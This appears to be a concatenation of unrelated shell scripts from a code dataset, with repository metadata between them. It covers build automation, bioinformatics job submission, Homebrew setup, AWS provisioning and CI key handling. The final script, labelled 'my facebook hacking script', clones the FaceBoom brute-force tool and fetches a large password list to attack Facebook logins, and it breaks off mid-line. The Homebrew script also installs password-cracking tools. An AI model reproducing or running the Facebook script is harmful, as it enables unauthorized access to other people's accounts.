print_banner()
{
# Test syntax.
if [ $# = 0 ] ; then
echo "Usage: printbanner \"message\""
exit 1
fi
dashes=`echo "$1" | sed s/./=/g`; \
echo "$dashes"; \
echo "$1"; \
echo "$dashes"
return 0
}
data_file ()
{
echo "======================================================================"
echo "gputils Binary Distribution"
echo "======================================================================"
echo "Maintainer: $NAME"
echo "Email: $EMAIL"
echo "Date: $(date +%x)"
echo "Host: $host"
echo "Src version: $version"
echo "======================================================================"
echo "Comments:"
echo "$comments"
echo
echo "======================================================================"
echo "Notes:"
echo "This is a binary gputils distribution. This file was not necessarily"
echo "generated by the gputils project. It was generated by the maintainer"
echo "listed above. If you have any problems with the distribution, contact"
echo "the maintainer first."
echo " "
echo "The gputils sourcecode and support are available at:"
echo "<URL:http://gputils.sourceforge.net/>"
echo
echo "======================================================================"
}
################################################################################
# process options
################################################################################
for ac_option
do
# If the previous option needs an argument, assign it.
if test -n "$ac_prev"; then
eval "$ac_prev=\$ac_option"
ac_prev=
continue
fi
case "$ac_option" in
-*=*) ac_optarg=`echo "$ac_option" | sed 's/[-_a-zA-Z0-9]*=//'` ;;
*) ac_optarg= ;;
esac
case "$ac_option" in
--build=*)
build="$ac_optarg"
;;
--release=*)
release="$ac_optarg"
;;
--email=*)
EMAIL="$ac_optarg"
;;
--help)
cat << EOF
Usage: make-mingw [options]
Options: [defaults in brackets after descriptions]
Configuration:
--help print this message
--email=EMAIL email address of the maintainer
--name=NAME name of the maintainer
--save-temps leave temporary directories
Directory and file names:
--release=NUMBER release number of the distribution [none]
--patch=PATCH patch applied to source
--source=SRCFILENAME name of the source file
Host type:
--build=BUILD configure for building on BUILD [guessed]
EOF
exit 0
;;
--save-temps)
clean=no
;;
--name=*)
NAME="$ac_optarg"
;;
--source=*)
srcfilename="$ac_optarg"
;;
--patch=*)
patch="$ac_optarg"
;;
*)
echo "invalid option, use --help to show usage"
exit 1
;;
esac
done
################################################################################
# extract files from source archive
################################################################################
if [ ! "$srcfilename" ]; then
echo "error: specify source filename using --source=FILENAME"
exit 1
elif [ ! -f "$srcfilename" ]; then
echo "$srcfilename: No such file"
exit 1
else
# determine the src directory and version
archive_type=`echo "$srcfilename" | sed -e 's%.*-.\..\..\..*\.\(.*\)%\1%'`
version=`echo "$srcfilename" | sed -e 's%.tar.'"$archive_type"'%%g'`
ver=`echo "$version" | sed -e 's%.*-\(.*\)%\1%'`
ver_major=`echo "$ver" | awk 'BEGIN {FS="."} {print $1}'`
ver_minor=`echo "$ver" | awk 'BEGIN {FS="."} {print $2}'`
ver_revision=`echo "$ver" | awk 'BEGIN {FS="."} {print $3}'`
ver_build=0
# extract the files
rm -Rf "$version"
if test "$archive_type" = "bz2"; then
tar -jxf "$srcfilename"
else
tar -zxf "$srcfilename"
fi
# make the distribution directory
root_dir="`pwd`"
dist_dir="`pwd`/dist"
rm -Rf "$dist_dir"
mkdir -p "$dist_dir/gputils"
fi
# copy the patch to the distribution and patch the source
if [ "$patch" ]; then
if [ -f "$patch" ]; then
echo "copying patch to binary distribution... $patch. "
cp "$patch" "$dist_dir/gputils"
echo "patching source..."
patch -p0 < "$patch"
else
echo "error: patch file \"$patch\" not found."
exit 1;
fi
fi
# change to the source directory
if [ -d "$version" ]; then
cd "$version"
echo "changing to source directory... $version"
else
echo "error: directory \"$version\" not found"
exit 1
fi
################################################################################
# check the options
################################################################################
# Define the host system (mingw)
config_options="$config_options --host=$host"
echo "checking host system type... $host"
# Detect the system that the distribution to be built on.
if [ ! "$build" ]; then
build=`./config.guess`
fi
config_options="$config_options --build=$build"
echo "checking build system type... $build"
echo "checking maintainer name... $NAME"
echo "checking maintainer email address... $EMAIL"
# if release is not specified use "1"
dash_release=""
if [ "$release" ]; then
dash_release="-$release"
fi
echo "checking distribution dash number... $dash_release"
# generate the complete distribution name
distname="$version-$distname$dash_release"
echo "checking distribution name... $distname"
################################################################################
# compile the project and install files to the distribution directory
################################################################################
print_banner "Configuring project"
CC="${CC}" CFLAGS=${CFLAGS} AR="${AR}" RANLIB="${RANLIB}" STRIP="${STRIP}" GPUTILS_HTMLDOC_PATH="${dist_dir}/gputils/doc/html-help" ./configure --prefix="${dist_dir}/gputils" --datadir="${dist_dir}" \
$config_options
RETVAL=$?
if [ $RETVAL -ne 0 ]; then
echo "error: configuring gputils failed"
exit 1
fi
print_banner "Compiling project"
make
RETVAL=$?
if [ $RETVAL -ne 0 ]; then
echo "error: compiling gputils failed"
exit 1
fi
print_banner "Installing files"
make install
RETVAL=$?
if [ $RETVAL -ne 0 ]; then
echo "error: gputils install failed"
exit 1
fi
print_banner "Copying project data to distribution directory"
# copy the common files
for x in $common
do
cp "$x" "$dist_dir/gputils/$x.txt"
$UNIX2DOS "$dist_dir/gputils/$x.txt"
done
echo "copying project data... $common"
# copy the docs
mkdir "$dist_dir/gputils/doc"
for x in $doc
do
cp "./doc/$x" "$dist_dir/gputils/doc"
done
echo "copying project documents... $doc"
# remove unnecessary directories
for x in $delete_dir
do
rm -Rf "$dist_dir/gputils/$x"
done
echo "removing directories... $delete_dir"
# generate the binary distribution data file
data_file > "$dist_dir/gputils/DISTRIBUTION.txt"
$UNIX2DOS "$dist_dir/gputils/DISTRIBUTION.txt"
echo "creating binary data file... DISTRIBUTION.txt"
# copy the NSIS script and icon
cp "$root_dir/gputils.nsi" "$dist_dir/gputils/gputils.nsi"
echo "copying NSIS script... gputils.nsi"
# convert the remaining project data to dos format
$UNIX2DOS $dist_dir/gputils/header/*
$UNIX2DOS $dist_dir/gputils/lkr/*
echo "converting project data to DOS format... done"
################################################################################
# make the archive
################################################################################
cd "$dist_dir"
if test x$use_zip = xyes; then
filename="$distname.zip"
zip -r "$filename" gputils
elif test "$archive_type" = "bz2"; then
filename="$distname.tar.$archive_type"
tar -jcvf "$filename" gputils
else
filename="$distname.tar.$archive_type"
tar -zcvf "$filename" gputils
fi
if [ -f "$filename" ]; then
mv "$filename" ..
print_banner "$filename ready for distribution"
fi
# clean the dist and src directories
cd ..
if test x$clean = xyes; then
rm -Rf "$version"
rm -Rf "$dist_dir"
fi
cd "dist/gputils"
"${MAKENSIS}" -DVER_MAJOR=$ver_major -DVER_MINOR=$ver_minor -DVER_REVISION=$ver_revision -DVER_BUILD=$ver_build -DDASH_RELEASE="" gputils.nsi
exit
| true |
8b227b8f54efc3c985635650effbc1e251eb9187 | Shell | Lloyd-LiuSiyi/TWAS-pipeline | /gtex-fusion.sge | UTF-8 | 1,141 | 2.625 | 3 | [] | no_license | #!/bin/bash
# 12-7-2017 MRC-Epid JHZ
Rscript=/genetics/bin/Rscript.sh
sumstats=/genetics/bin/FUSION/tests/PGC2.SCZ.sumstats
mkdir $sumstats.tmp
cd $sumstats.tmp
ln -sf /genetics/bin/FUSION/tests/glist-hg19
for GTEx in $(/bin/cat /genetics/bin/FUSION/GTEx.list);do
for chr in $(seq 22); do
echo -e "#!/bin/bash\n\
$Rscript /genetics/bin/fusion_twas/FUSION.assoc_test.R \
--sumstats $sumstats \
--weights /genetics/bin/FUSION/GTEx/$GTEx.pos \
--weights_dir /genetics/bin/FUSION/GTEx \
--ref_ld_chr /genetics/bin/FUSION/LDREF/1000G.EUR. \
--chr ${chr} \
--out $sumstats.tmp/${GTEx}_${chr}.dat;\
N=`/bin/awk 'END{print FNR-1}' $sumstats.tmp/${GTEx}_${chr}.dat`;\
/bin/cat $sumstats.tmp/${GTEx}_${chr}.dat|\
/bin/awk -vN=$N -f /genetics/bin/TWAS-pipeline/gtex-fusion.awk > $sumstats.tmp/${GTEx}_${chr}.top;\
$Rscript /genetics/bin/fusion_twas/FUSION.post_process.R \
--sumstats $sumstats \
--input $sumstats.tmp/${GTEx}_${chr}.top \
--out $sumstats.tmp/${GTEx}_${chr}.top.analysis \
--ref_ld_chr /genetics/bin/FUSION/LDREF/1000G.EUR. --chr ${chr} --plot --locus_win 100000" > sge.sh
sge "sge.sh"
done
done
| true |
669ce63378cd874ba7d9fd3e73b14ed09b9e944b | Shell | alsvartr/atceph | /scripts/pimp-my-elevator.sh | UTF-8 | 525 | 3.203125 | 3 | [
"MIT"
] | permissive | #!/bin/bash
SSD_ELEVATOR="noop"
HDD_ELEVATOR="deadline"
for i in `ls /sys/block/`
do
elevator=`cat /sys/block/$i/queue/scheduler`
if [ "$elevator" == "none" ]; then
continue
fi
rotational=`cat /sys/block/$i/queue/rotational`
if [ "$rotational" == "0" ]; then
ELEVATOR=${SSD_ELEVATOR}
else
ELEVATOR=${HDD_ELEVATOR}
fi
echo $ELEVATOR > /sys/block/$i/queue/scheduler
echo "SET $ELEVATOR TO /dev/$i"
done
| true |
27ebf526a72aefbf0e2d3a3e973be46065b8eb2d | Shell | dphansen/macdotfiles | /brew.sh | UTF-8 | 5,816 | 2.875 | 3 | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | #!/usr/bin/env bash
# Install command-line tools using Homebrew.
# Ask for the administrator password upfront.
sudo -v
# Keep-alive: update existing `sudo` time stamp until the script has finished.
while true; do sudo -n true; sleep 60; kill -0 "$$" || exit; done 2>/dev/null &
# Check for Homebrew,
# Install if we don't have it
if test ! $(which brew); then
echo "Installing homebrew..."
ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
fi
# Make sure we’re using the latest Homebrew.
brew update
# Upgrade any already-installed formulae.
brew upgrade
# Install GNU core utilities (those that come with macOS are outdated).
# Don’t forget to add `$(brew --prefix coreutils)/libexec/gnubin` to `$PATH`.
brew install coreutils
# Install some other useful utilities like `sponge`.
brew install moreutils
# Install GNU `find`, `locate`, `updatedb`, and `xargs`, `g`-prefixed.
brew install findutils
# Install GNU `sed`, overwriting the built-in `sed`.
brew install gnu-sed --with-default-names
# Install Bash 4.
# Note: don’t forget to add `/usr/local/bin/bash` to `/etc/shells` before
# running `chsh`.
brew install bash
brew install bash-completion2
# Switch to using brew-installed bash as default shell
if ! fgrep -q '/usr/local/bin/bash' /etc/shells; then
echo '/usr/local/bin/bash' | sudo tee -a /etc/shells;
chsh -s /usr/local/bin/bash;
fi;
# Install `wget` with IRI support.
brew install wget --with-iri
# Install GnuPG to enable PGP-signing commits.
brew install gnupg
# Install more recent versions of some macOS tools.
brew install vim --with-override-system-vi
brew install grep
brew install openssh
brew install screen
brew install homebrew/php/php56 --with-gmp
brew install emacs
# Install font tools.
brew tap bramstein/webfonttools
brew install sfnt2woff
brew install sfnt2woff-zopfli
brew install woff2
# Install some CTF tools; see https://github.com/ctfs/write-ups.
brew install aircrack-ng
brew install bfg
brew install binutils
brew install binwalk
brew install cifer
brew install dex2jar
brew install dns2tcp
brew install fcrackzip
brew install foremost
brew install hashpump
brew install hydra
brew install john
brew install knock
brew install netpbm
brew install nmap
brew install pngcheck
brew install socat
brew install sqlmap
brew install tcpflow
brew install tcpreplay
brew install tcptrace
brew install ucspi-tcp # `tcpserver` etc.
brew install xpdf
brew install xz
brew install ipython
# Install other useful binaries.
brew install ack
#brew install exiv2
brew install git
brew install git-lfs
brew install imagemagick --with-webp
brew install lua
brew install lynx
brew install p7zip
brew install pigz
brew install pv
brew install rename
brew install rlwrap
brew install ssh-copy-id
brew install tree
brew install vbindiff
brew install zopfli
brew install rsync
brew install timemachineeditor
# Install Python
brew install python
brew install python3
# Install node.js
brew install node
# Install Cask
brew install caskroom/cask/brew-cask
brew tap caskroom/versions
brew tap caskroom/drivers
# Drivers
brew cask install logitech-options
# Core casks
#brew cask install --appdir="/Applications" alfred
#brew cask install --appdir="~/Applications" iterm2
brew cask install --appdir="~/Applications" java
brew cask install --appdir="~/Applications" xquartz
# Development tool casks
#brew cask install --appdir="/Applications" sublime-text
#brew cask install --appdir="/Applications" atom
#brew cask install --appdir="/Applications" virtualbox
#brew cask install --appdir="/Applications" vagrant
#brew cask install --appdir="/Applications" macdown
# Misc casks
#brew cask install --appdir="/Applications" google-chrome
#brew cask install --appdir="/Applications" firefoxdeveloperedition
brew cask install --appdir="/Applications" firefox
brew cask install --appdir="/Applications" skype
brew cask install --appdir="/Applications" slack
brew cask install --appdir="/Applications" dropbox
#brew cask install --appdir="/Applications" evernote
brew cask install --appdir="/Applications" 1password
#brew cask install --appdir="/Applications" gimp
#brew cask install --appdir="/Applications" inkscape
#brew cask install --appdir="/Applications" crashplan
#brew cask install --appdir="/Applications" freedome
brew cask install --appdir="/Applications" microsoft-office
brew cask install --appdir="/Applications" parallels
brew cask install --appdir="/Applications" spotify
brew cask install --appdir="/Applications" visual-studio-code
#brew cask install --appdir="/Applications" visual-studio
brew cask install --appdir="/Applications" vlc
brew cask install --appdir="/Applications" whatsapp
brew cask install --appdir="/Applications" mactex
brew cask install --appdir="/Applications" anaconda
brew cask install --appdir="/Applications" teamviewer
brew cask install --appdir="/Applications" github
brew cask install --appdir="/Applications" osxfuse
brew cask install --appdir="/Applications" cryptomator
#brew cask install --appdir="/Applications" joplin
#brew cask install --appdir="/Applications" zotero
brew cask install --appdir="/Applications" protonvpn
brew cask install --appdir="/Applications" grammarly
brew cask install --appdir="/Applications" prowritingaid
brew cask install --appdir="/Applications" istat-menus
brew cask install --appdir="/Applications" rsyncosx
brew cask install --appdir="/Applications" macs-fan-control
brew cask install --appdir="/Applications" caffeine
brew cask install borgbackup
# Install Docker, which requires virtualbox
#brew install docker
#brew install boot2docker
# Install the Adobe Creative Suite setup
brew cask install --appdir="/Applications" adobe-creative-cloud
# Remove outdated versions from the cellar.
brew cleanup
# Install tldr through npm
npm install -g tldr
| true |
a009b9bb07e8c5bdd187773f702cdf6fb6fd0fbe | Shell | dbertolini84/FnFast | /scripts/batchjobs_cov_loopSPT | UTF-8 | 468 | 2.8125 | 3 | [] | no_license | #!/bin/bash
# submission command: qsub [options] [executable] [arguments]
# -cwd: central working directory
# -b y: program is a binary file
# example:
# qsub -cwd -b y ./runFnFast_cov_loopSPT 0.1 0.1 37 test
# runs the job with k = kp = 0.1, seed = 37, base file name = "test"
# the progarm outputs the result to test_R37.dat
# loop over random seeds
for seed in $(seq 1 100)
do
qsub -cwd -b y ./runFnFast_cov_loopSPT 0.1 0.1 ${seed} cov_loopSPT_0.1_0.1
done
| true |
764edbf4ab1abd13eade12b6a5ce4991456da735 | Shell | ivanviso/ASO | /Dificil.sh | UTF-8 | 1,504 | 3.625 | 4 | [] | no_license | # Declaramos funciones para evitar que nuestro parsing sea algo legible.
# Es una las
function horasasegundos {
IFS=":"
read -a numero <<< $tiempo
segundos=${numero[2]}
minutos=${numero[1]}
horas=${numero[0]}
let "segundosTotales=segundos + minutos*60 + horas*3600"
unset IFS
}
function segundosahoras { #Es necesario haber invocado horasasegundos antes.
segundos=$(printf "%02d\n" $(($1 % 60)))
minutos=$(printf "%02d\n" $((($1 / 60) % 60)))
horas=$(printf "%02d\n" $((($1 / 60) / 60)))
#printf nos permite mantener los ceros de margen para evitar que 05 se convierta en 5
}
function ordenar {
IFS=$'\n'
Ordenado=($(sort -r <<<"${usuarioTiempoSegundos[*]}"))
unset IFS
}
declare -A usuarioTiempoSegundos #Es necesario declarar los arrays asociativos. De lo contrario interpreta
declare -A usuarioTiempoCadena #todos los indices como [0] al considerar el texto como nulo. Divertido de descubrir.
while IFS=" " read -r nombre tiempo
do
horasasegundos $tiempo
usuarioTiempoSegundos[$nombre]=$((${usuarioTiempoSegundos[$nombre]} + $segundosTotales))
segundosahoras ${usuarioTiempoSegundos[$nombre]}
usuarioTiempoCadena[$nombre]=$horas:$minutos:$segundos
done < usuarios.txt
ordenar
for i in "${Ordenado[@]}"
do
for key in "${!usuarioTiempoCadena[@]}"
do
if [[ $i == ${usuarioTiempoSegundos[$key]} ]]
then
echo "$key => ${usuarioTiempoCadena[$key]}"
fi
done
done
| true |
52288cc778da3631bb3d800a9a7d24c434cfe5a3 | Shell | zycoder0day/ec2sisi | /auto.sh | UTF-8 | 8,681 | 3.609375 | 4 | [] | no_license | #!/bin/bash
## Networking
# . Create VPC
# . Create two subnets
# . Create IGW
# . Attach IGW to VPC
# . Create public route table, attached to VPC
# . Create route
# . Associate route table with both subnets
## Instances
# . Create SSH keys
# . Get Ubuntu image id
# . Create a specific security group for public instance (ingress port 80 tcp)
# . Create a locked down security group for private instance
# . Run IT instance with new first group above
# . Run Finance instance with second security group
## Elastic IP
# . Allocate Elastic IP
# . Associate Elastic IP with IT instance
## DONE
function createKeys () {
# param: name
keyname="$1"
echo "Creating keys..."
local raw=$(aws ec2 create-key-pair --key-name "$keyname" --output text --query KeyMaterial)
echo "$raw" > "$keyname".pem
echo "- Key created: ${keyname}.pem"
# aws ec2 create-key-pair --key-name <name>
}
function createVPC () {
# param: cidr block
echo "Creating VPC..."
local raw=$(aws ec2 create-vpc --cidr-block 10.0.0.0/16 --output text)
cvpc=$(echo "$raw" | grep "pending" | awk '{print $8}')
echo "- VPC ID: $cvpc"
# aws ec2 create-vpc --cidr-block <cidr block> --
# ex:
# aws ec2 create-vpc --cidr-block 10.0.0.0/16
}
function createSubnets () {
# param: vpc id, cidr block, az name
local vpcid="$1"
local pubcidr="10.0.1.0/24"
local privcidr="10.0.2.0/24"
local az="us-east-1d"
echo "Creating subnets..."
local subraw=$(aws ec2 create-subnet --vpc-id "$vpcid" --cidr-block "$pubcidr" --availability-zone "$az" --output text)
pubsub=$(echo "$subraw" | awk '{print $12}')
echo "- Public Subnet ID: $pubsub"
local subraw=$(aws ec2 create-subnet --vpc-id "$vpcid" --cidr-block "$privcidr" --availability-zone "$az" --output text)
privsub=$(echo "$subraw" | awk '{print $12}')
echo "- Private Subnet ID: $privsub"
# aws ec2 create-subnet --vpc-id <vpc-id> --cidr-block <cidr-block> --availability-zone <az-name>
# ex:
# aws ec2 create-subnet --vpc-id aea3a43eajhja --cidr-block 10.0.1.0/24 --availability-zone us-east-1d
}
function createIGW () {
# param: none
echo "Creating Internet Gateway..."
local raw=$(aws ec2 create-internet-gateway --output text)
igw=$(echo "$raw" | awk '{print $2}')
echo "- Internet Gateway: $igw"
# aws ec2 create-internet-gateway
}
function attachIGW () {
# param: igw id, vpc id
local vpcid="$1"
local igwid="$2"
echo "Attaching Internet Gateway..."
local raw=$(aws ec2 attach-internet-gateway --vpc-id "$vpcid" --internet-gateway-id "$igwid" --output text)
echo "- $igwid attached to $vpcid"
# there is no output from this command on success
# aws ec2 attach-internet-gateway --internet-gateway-id <igw-id> --vpc-id <vpc-id>
}
function createRouteTable () {
# param: vpc id
local vpcid="$1"
echo "Creating route table..."
local raw=$(aws ec2 create-route-table --vpc-id="$vpcid" --output text)
routetable=$(echo $raw | awk '{print $3}')
echo "- Route Table ID: $routetable"
# aws ec2 create-route-table --vpc-id <vpc-id>
}
function createRoute () {
# param: vpc id, igw id, route table id
local rtid="$1"
local igwid="$2"
local vpcid="$3"
echo "Creating route..."
local raw=$(aws ec2 create-route --route-table-id "$rtid" --gateway-id "$igwid" --destination-cidr-block "0.0.0.0/0")
echo "- Route created between Route Table $rtid and Internet Gateway $igwid"
# aws ec2 create-route --route-table-id <route table id> --gateway-id <igw-id> --destination-cidr-block <0.0.0.0/0>
}
function associateRoute () {
# params: route table id, [subnet id, igw id]
local rtid="$1"
#local subid="$2"
echo "Associating route with subnet..."
local raw=$(aws ec2 associate-route-table --route-table-id "$rtid" --subnet-id "$pubsub" --output text)
assocrouteid=$(echo "$raw" | awk '{print $2}')
echo "- Route Table $rtid associated with Subnet $pubsub"
local raw=$(aws ec2 associate-route-table --route-table-id "$rtid" --subnet-id "$privsub" --output text)
assocrouteid2=$(echo "$raw" | awk '{print $2}')
echo "- Route Table $rtid associated with Subnet $privsub"
# aws ec2 associate-route-table --route-table-id <route-table-id> [--subnet-id <subnet-id>] [--gateway-id <igw-id>]
}
function getImage () {
echo "Fetching image id..."
imageid=$(aws ec2 describe-images --owner 099720109477 --query 'Images[*].[ImageId]' --output text --filters "Name=architecture,Values=x86_64" "Name=name,Values=ubuntu/images/hvm-ssd/ubuntu-focal-20.04-amd64-server-20210223")
echo "- Image ID for Ubuntu 20.04: $imageid"
# aws ec2 describe-images --owner 099720109477 --query 'Images[*].[ImageId]' --output text --filters "Name=architecture,Values=x86_64" "Name=name,Values=ubuntu/images/hvm-ssd/ubuntu-focal-20.04-amd64-server-20210223"
# returns: ami-042e8287309f5df03
}
function createSG () {
echo "Creating security groups..:"
# public
local raw=$(aws ec2 create-security-group --group-name "Public SG" --description "SG for the public instances" --vpc-id "$cvpc" --output text)
pubsg=$(echo $raw | awk '{print $1}')
echo "- Public Security Group: $pubsg"
# private
local raw=$(aws ec2 create-security-group --group-name "Private SG" --description "SG for the private instances" --vpc-id "$cvpc" --output text)
privsg=$(echo $raw | awk '{print $1}')
echo "- Private Security Group: $privsg"
}
function createRules () {
echo "Modifying security group rules..."
# public allow ingress port 80
aws ec2 authorize-security-group-ingress --group-id "$pubsg" --protocol tcp --port 80 --cidr "0.0.0.0/0"
echo "- Added ingress allow port 80 on $pubsg"
}
function runInstance () {
# param: image id, type, key name, subnet id, sec group id
echo "Creating instance..."
# public
local raw=$(aws ec2 run-instances --image-id "$imageid" --count 1 --instance-type "t2.micro" --key-name "$keyname" --subnet-id "$pubsub" --security-group-ids "$pubsg" --output text --query "Instances[].InstanceId")
pubinstance=$(echo "$raw")
echo "- Public Instance ID: $pubinstance"
# private
local raw=$(aws ec2 run-instances --image-id "$imageid" --count 1 --instance-type "t2.micro" --key-name "$keyname" --subnet-id "$privsub" --security-group-ids "$privsg" --output text --query "Instances[].InstanceId")
privinstance=$(echo "$raw")
echo "- Private Instance ID: $privinstance"
# aws ec2 run-instances --image-id <image-id> --count <1-9> --instance-type <type> --key-name <keyname> --subnet-id <subnet-id> --security-group-ids <security-group-id>
# ex:
# aws ec2 run-instances --image-id ami-0742b4e673072066f --count 1 --instance-type t2.micro --key-name michaelschool --subnet-id subnet-9c0e78bd --security-group-ids sg-04e83d3d8a323078d
# ubuntu 20 LTS x64 - ami-042e8287309f5df03
}
function allocateElastic () {
# param: none
echo "Allocating Elastic IP..."
local raw=$(aws ec2 allocate-address --domain vpc --network-border-group us-east-1 --output text)
allocationid=$(echo "$raw" | awk '{print $1}')
elasticip=$(echo "$raw" | awk '{print $4}')
echo "- Elastic IP: $elasticip allocated with id: $allocationid"
# aws ec2 allocate-address --domain vpc --network-border-group us-east-1 --output text
# ex output: eipalloc-0d47df0404e8cc30d vpc us-east-1 54.237.44.241 amazon
}
function associateElastic () {
# param: allocation id, instance id
echo "Associating Elastic IP with public instance..."
# check if instance is in state 'running'
check=$(aws ec2 describe-instances --instance-id "$pubinstance" --output text | grep STATE | awk '{print $2}')
running="16"
assocdone=0
alldone=1
while [ "$assocdone" -eq "0" ]; do
if [[ "$check" -eq "$running" ]]; then
local raw=$(aws ec2 associate-address --allocation-id "$allocationid" --instance-id "$pubinstance")
assocdone=$alldone
echo "- Instance $pubinstance associated with Elastic IP $elasticip"
else
echo "- Instance $pubinstance is still pending (code $check), waiting..."
sleep 5
check=$(aws ec2 describe-instances --instance-id "$pubinstance" --output text | grep STATE | awk '{print $2}')
fi
done
# aws ec2 associate-address --allocation-id <allocation-id> --instance-id <instance-id>
}
### EXECUTE
## Create VPC
createVPC
## Create Subnets
createSubnets "$cvpc"
## Create IGW
createIGW
# Attach IGW
attachIGW "$cvpc" "$igw"
## Routing
# Create route table
createRouteTable "$cvpc"
# Create route
createRoute "$routetable" "$igw"
# Associate route with public subnet
associateRoute "$routetable" #"$pubsub"
## Instances
# Keys
createKeys "cr8Uf5uEmL"
# Get Ubuntu Image
getImage
# Create security groups and apply rules
createSG
createRules
# Run instances
runInstance
## Elastic IP
# Allocate Elastic IP
allocateElastic
# Associate Elastic IP
associateElastic
### DONE
echo "DONE!"
| true |
c9f7b244f028344ef0be0c693abf448e8973e432 | Shell | coeka/hackiebox_cfw_ng | /arm-sdk/xpack-arm-none-eabi-gcc-10.2.1-1.1/distro-info/scripts/common-functions-source.sh | UTF-8 | 3,637 | 3.546875 | 4 | [
"Apache-2.0"
] | permissive | # -----------------------------------------------------------------------------
# This file is part of the xPacks distribution.
# (https://xpack.github.io)
# Copyright (c) 2019 Liviu Ionescu.
#
# Permission to use, copy, modify, and/or distribute this software
# for any purpose is hereby granted, under the terms of the MIT license.
# -----------------------------------------------------------------------------
# Helper script used in the second edition of the GNU MCU Eclipse build
# scripts. As the name implies, it should contain only functions and
# should be included with 'source' by the container build scripts.
# -----------------------------------------------------------------------------
function host_custom_options()
{
local help_message="$1"
shift
ACTION=""
DO_BUILD_WIN=""
IS_DEBUG=""
IS_DEVELOP=""
WITH_STRIP="y"
IS_NATIVE="y"
WITHOUT_MULTILIB=""
WITH_PDF="y"
WITH_HTML="n"
WITH_NEWLIB_LTO="n"
WITH_LIBS_LTO="n"
WITH_TESTS="y"
JOBS="1"
while [ $# -gt 0 ]
do
case "$1" in
clean|cleanlibs|cleanall)
ACTION="$1"
;;
--win|--windows)
DO_BUILD_WIN="y"
;;
--debug)
IS_DEBUG="y"
;;
--develop)
IS_DEVELOP="y"
;;
--jobs)
shift
JOBS=$1
;;
--help)
echo
echo "Build a local/native ${DISTRO_UC_NAME} ${APP_UC_NAME}."
echo "Usage:"
# Some of the options are processed by the container script.
echo "${help_message}"
echo
exit 0
;;
# --- specific
--disable-multilib)
WITHOUT_MULTILIB="y"
;;
--without-pdf)
WITH_PDF="n"
;;
--with-pdf)
WITH_PDF="y"
;;
--without-html)
WITH_HTML="n"
;;
--with-html)
WITH_HTML="y"
;;
--disable-strip)
WITH_STRIP="n"
shift
;;
--disable-tests)
WITH_TESTS="n"
shift
;;
*)
echo "Unknown action/option $1"
exit 1
;;
esac
shift
done
if [ "${DO_BUILD_WIN}" == "y" ]
then
if [ "${HOST_NODE_PLATFORM}" == "linux" ]
then
TARGET_PLATFORM="win32"
else
echo "Windows cross builds are available only on GNU/Linux."
exit 1
fi
fi
}
# -----------------------------------------------------------------------------
function add_linux_install_path()
{
# Verify that the compiler is there.
"${WORK_FOLDER_PATH}/${LINUX_INSTALL_RELATIVE_PATH}/${APP_LC_NAME}/bin/${GCC_TARGET}-gcc" --version
export PATH="${WORK_FOLDER_PATH}/${LINUX_INSTALL_RELATIVE_PATH}/${APP_LC_NAME}/bin:${PATH}"
echo ${PATH}
}
# -----------------------------------------------------------------------------
function define_flags_for_target()
{
local optimize="${CFLAGS_OPTIMIZATIONS_FOR_TARGET}"
if [ "$1" == "" ]
then
# For newlib, optimize for speed.
optimize="$(echo ${optimize} | sed -e 's/-O[123]/-O2/g')"
# Normally this is the default, but for just in case.
optimize+=" -fexceptions"
elif [ "$1" == "-nano" ]
then
# For newlib-nano optimize for size and disable exceptions.
optimize="$(echo ${optimize} | sed -e 's/-O[123]/-Os/g')"
optimize="$(echo ${optimize} | sed -e 's/-Ofast/-Os/p')"
optimize+=" -fno-exceptions"
fi
# Note the intentional `-g`.
CFLAGS_FOR_TARGET="${optimize} -g"
CXXFLAGS_FOR_TARGET="${optimize} -g"
if [ "${WITH_LIBS_LTO}" == "y" ]
then
CFLAGS_FOR_TARGET+=" -flto -ffat-lto-objects"
CXXFLAGS_FOR_TARGET+=" -flto -ffat-lto-objects"
fi
}
| true |
21fb49aee4e4e0d2ce4333cf445577f9b36e49bb | Shell | WorldBrain/Memex-Mobile | /write-android-keys.sh | UTF-8 | 1,341 | 3.140625 | 3 | [
"MIT"
] | permissive | #!/bin/sh
ENV_FILE="./app/android/app/google-services.json"
SERVICE_ACC_KEY="./app/android/service-account.json"
SIGN_KEY="./app/android/app/my-upload-key.keystore"
SENTRY_PROPS_FILE="./app/android/sentry.properties"
SSH_FILE="$HOME/.ssh/id_rsa"
# Set up private key
echo $IOS_REPO_PRIVATE_KEY | base64 -d > $SSH_FILE
chmod 600 $SSH_FILE
# Set up Android app signing key
echo $ANDROID_SIGN_KEY | base64 -d > $SIGN_KEY
chmod 400 $SIGN_KEY
# Set up Google Play service account config
echo $ANDROID_SERVICE_JSON | base64 -d > $SERVICE_ACC_KEY
chmod 400 $SERVICE_ACC_KEY
# Set up sentry properties
echo $SENTRY_PROPS | base64 -d > $SENTRY_PROPS_FILE
# Set up Firebase env file
if [ $1 = "production" ]; then
echo $ANDROID_APP_ENV | base64 -d > $ENV_FILE
else
echo $ANDROID_APP_DEV_ENV | base64 -d > $ENV_FILE
fi
# Enable SSH authentication
printf "%s\n" \
"Host gitlab.com" \
" User git" \
" IdentityFile $SSH_FILE" \
" StrictHostKeyChecking no" \
" CheckHostIP no" \
" PasswordAuthentication no" \
" LogLevel ERROR" \
"" \
"Host github.com" \
" User git" \
" IdentityFile $SSH_FILE" \
" StrictHostKeyChecking no" \
" CheckHostIP no" \
" PasswordAuthentication no" \
" LogLevel ERROR" >> ~/.ssh/config
| true |
1e8226de03fda16b24f9c10714e2bbad8ae2db6e | Shell | Gajendrsingh/facebook | /facebook.sh | UTF-8 | 1,230 | 2.71875 | 3 | [] | no_license | #!/bin/bash
echo "my facebook hacking script"
RED="\e[92m"
ENDCOLOR="\e[0m"
echo -e "${RED} ___--=--------___
/. \___\____ _, \_ /-\
/. . _______ __/=====@
\----/ | / \______/ \-/
_/ _/ o \
/ | o / ___ \
/ / o\\ | / O \ /| __-_
|o| o\\\ | \ \ /__--o/o___-_
| | \\\-_ \____ ---- o___-
|o| \_ \ /\______-o\_-
| \ _\ \ _/ / |
\o \_ _/ __/ /
\ \-/ _ /|_
\_ / | - \ |\
\____/ \ | / \ |\
| o | | \ |
| | | \ | \
/ | / \ \ \
/| \o|\--\ / o |\--\
\----------' \---------'${ENDCOLOR}"
apt update
apt install git python python3 wget -y
git clone https://github.com/Oseid/FaceBoom
cd FaceBoom
pip install mechanize
wget https://github.com/danielmiessler/SecLists/raw/master/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt
RED="\e[31m"
